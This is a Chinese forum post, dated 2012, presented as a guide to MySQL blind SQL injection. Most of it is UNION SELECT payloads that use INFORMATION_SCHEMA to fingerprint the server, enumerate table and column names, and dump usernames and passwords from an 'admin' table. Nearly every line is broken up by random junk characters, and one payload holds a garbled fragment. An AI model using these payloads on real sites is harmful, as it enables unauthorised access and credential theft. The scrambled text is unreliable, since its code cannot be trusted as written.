本文介绍MYSQL盲注的一些语句和方法
5 s( v0 |1 C: T0 }
: \& P4 Z+ i3 L学习盲注前先了解下 IFORMATION_SCHEMA 库' x1 l u% a5 Y. t
( R% X2 t; P' L" i0 i8 Q. s$ QMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
% C, H. g! i9 L7 F6 F存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
3 p3 H1 }7 ~7 ^2 q1.得到所有数据库名:4 [ d5 o, i: D Z5 j, [
|SCHEMATA ->存储数据库名的表) w0 v9 I; |4 R( R% _8 M
|---字段:SCHEMA_NAME ->数据库名称
1 X, G7 w, T: X) x: U% Q% @0 q) p5 ~* @5 ^& S7 L: W" ] f
|TABLES ->存储表名
7 L0 r" {# ~! m; p% ||---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
Z4 |( u( f. \" j5 I/ c|---字段:TABLE_NAME ->存储表的表名1 {* s9 s. D0 f8 J) g) }. Y+ r1 i
8 [0 S+ [) ^ U0 \9 m* ^7 h|COLUMNS ->存储的字段名表
. |+ t4 x# |/ p% f- k4 ^4 q. c# f|---字段:TABLE_SCHEMA ->该字段所属数据库名$ }3 B/ e8 s' Z8 M6 ]. ~" ~7 J
|---字段:TABLE_NAME ->存储所属表的名称
$ }0 T( E( V, r6 z8 q, D4 T* u1 C( `7 l w' Y+ q
|---字段:COLUMN_NAME ->该字段的名称5 s, C% h( s4 `/ G( v/ w
" |6 z) a1 \# ^1 Q+ ?+ T5 I
5 N' M4 h& y& }/ d- O$ @/ c
, l2 _' M, K3 n _- @###########################################################################1 p8 [& ] Z6 S! f
9 e; W0 m* k3 g, `1 e: {
0x001 获取系统信息:$ I, ~& r! ^9 R5 J& _1 A# n
- q" v5 n! C# [9 e) l: Sunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*7 K4 h! ?% ^3 x; N" h* M
8 A+ g" H9 q* k7 H. N
/*/ O* p l5 {/ A! F- I
7 B6 p) G7 N \& C
@@global.version_compile_os 获取系统版本
/ U$ ]$ u' x! q. E( S: ` E% m/ d( [6 B
' O- ]. W% f- m2 ]: S+ B( C@@datadir 数据库路径2 Z$ e! _4 {! D, O- ^8 g+ |# w2 x# E
database() 当前数据库名称
' ~5 a& i& k5 q$ c7 c+ O! B* b0x3c62723e 换行HEX值
& ]) ]+ z$ g( Q$ ~' J- X% X3 p b0 {' D; |
*/
4 r' e! ]2 S, I# n3 y( U" @
% f2 |. p: N: B5 `0 r
: u/ G8 d# o- n3 ~$ R% K& ]6 i2 T4 \( \
######################################################################' A; g$ B% ?) j, Y
4 D1 o$ v2 `+ h: P3 f' ~8 G0 o J/ {0x002 获取表名
6 n2 ~7 Q; G5 P$ ? h. h
8 {2 d8 D& w; ~ B. Xunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
z& s1 d' ^; V( K" A! g7 g8 Z# Z0 d9 v% O1 n( {5 k
9 A: I8 N% R/ |0 T, N3 P0 Y
' _8 M7 s |; M; ?4 ^6 L/*
! I+ Y5 f7 D! w+ A1 U1 K7 D9 i& u' ^- g J/ a2 X+ Z
0x67617264656e 为当前数据库名
4 M: X6 b: J1 ^. i: R: P" L2 q* z8 M7 W9 c0 v# Q
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名: R" x; w) g, w+ e5 ~
5 J9 k; G% s0 g5 J$ m2 W0 k
*/
3 G: @- z s: G# m$ b
3 i" H$ m9 T* Y( S+ l% b) d3 K2 f######################################################################1 y0 r+ s( @- v$ v
# b2 `6 X8 C( j) {4 Y. u
* e* Y6 T, V! B" K# W1 r/ g7 ?7 F# j5 g# H% [" d; }" ?3 r0 F7 k
0x003 获取字段& }7 k1 ~. i% S1 B4 N3 e5 U( {
; z! X4 A1 c0 h. \5 n: s! N! Y$ M
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*7 l6 b+ I; W J! Q s
3 x S' g# I+ L0 L& ?/ S0 P/ P1 O3 ^
/*/ y% h( \* ?; Z9 R' s
+ w$ D5 R& w5 l s6 X8 t4 C, h6 `group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段3 a9 f9 P* i3 h/ \' f) ]$ C9 l
+ [) x" ]5 f% u* r) i+ `- a% o0x61646d696e ->选择一个表6 L* f2 q* P; a* h& c3 w$ O
- A" V7 y5 C- E6 r* }0 T% [* z3 F! [4 g0x67617264656e ->数据库名' H* E2 W0 C! h4 E7 |
3 m9 {+ N5 ~1 e*/* F! [/ L9 q# `: [7 Y0 P
7 e' {& I1 B& F0 N' n1 ?4 Y# P* T#####################################################################
, M3 n2 x4 C' |+ q. U4 G' G' T9 W! m9 {0 C
; ~/ F! p' Y( i7 |
) {4 e- a) O( m
0x004 获取数据
7 u+ H7 x J7 p2 H7 W' I4 L& f8 z: c8 H7 t
union select 1,2,3$ k1 l5 J i) `: [ `( k- w. t
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin: }( l9 G6 |% @, r2 n7 L2 J
& o9 e! I1 Z9 h% Z' ]& k0 S( Dunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin* B U; ^+ g1 o7 o
5 u: S9 W3 I% Y5 b* d% P( u6 ]' B6 V, S
0 ^$ o5 ~1 c- X7 s2 W3 ^* i7 c) n5 A1 \2 v
/*
# U+ W2 o; m% Y0 n$ I
- h6 Z3 Y7 R1 s0x3c62723e 换行符号HEX编码9 q4 ]% Z8 i. t) @
* b; i0 y' |7 W3 U X* Qgroup_concat 同时获得该字段所有数据) C& S! d6 c/ H' O& T
$ }% d. x, {8 G) d8 Y*/
% t0 z+ X# U+ f
; i4 ]0 g/ f) Q! Q) ~ |
发表于 2012-9-13 17:48:44
收藏
支持
反对